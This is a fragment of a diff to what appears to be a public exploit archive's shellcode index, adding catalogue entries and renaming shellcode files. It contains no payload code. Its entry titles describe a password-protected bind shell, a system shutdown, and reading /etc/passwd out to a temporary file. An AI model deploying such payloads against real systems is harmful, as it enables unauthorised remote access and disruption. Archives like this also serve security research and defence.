+43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64
 43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64
 43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64
diff --git a/shellcodes/bsdi_x86/13257.txt b/shellcodes/bsdi_x86/13257.c
similarity index 100%
rename from shellcodes/bsdi_x86/13257.txt
rename to shellcodes/bsdi_x86/13257.c
diff --git a/shellcodes/bsdi_x86/13258.txt b/shellcodes/bsdi_x86/13258.c
similarity index 100%
rename from shellcodes/bsdi_x86/13258.txt
rename to shellcodes/bsdi_x86/13258.c
diff --git a/shellcodes/freebsd/13261.txt b/shellcodes/freebsd/13261.c
similarity index 100%
rename from shellcodes/freebsd/13261.txt
rename to shellcodes/freebsd/13261.c
diff --git a/shellcodes/hardware/13291.txt b/shellcodes/hardware/13291.asm
similarity index 100%
rename from shellcodes/hardware/13291.txt
rename to shellcodes/hardware/13291.asm
diff --git a/shellcodes/hardware/13292.txt b/shellcodes/hardware/13292.asm
similarity index 100%
rename from shellcodes/hardware/13292.txt
rename to shellcodes/hardware/13292.asm
diff --git a/shellcodes/hardware/13293.txt b/shellcodes/hardware/13293.asm
similarity index 100%
rename from shellcodes/hardware/13293.txt
rename to shellcodes/hardware/13293.asm
diff --git a/shellcodes/hp-ux/13295.txt b/shellcodes/hp-ux/13295.c
similarity index 100%
rename from shellcodes/hp-ux/13295.txt
rename to shellcodes/hp-ux/13295.c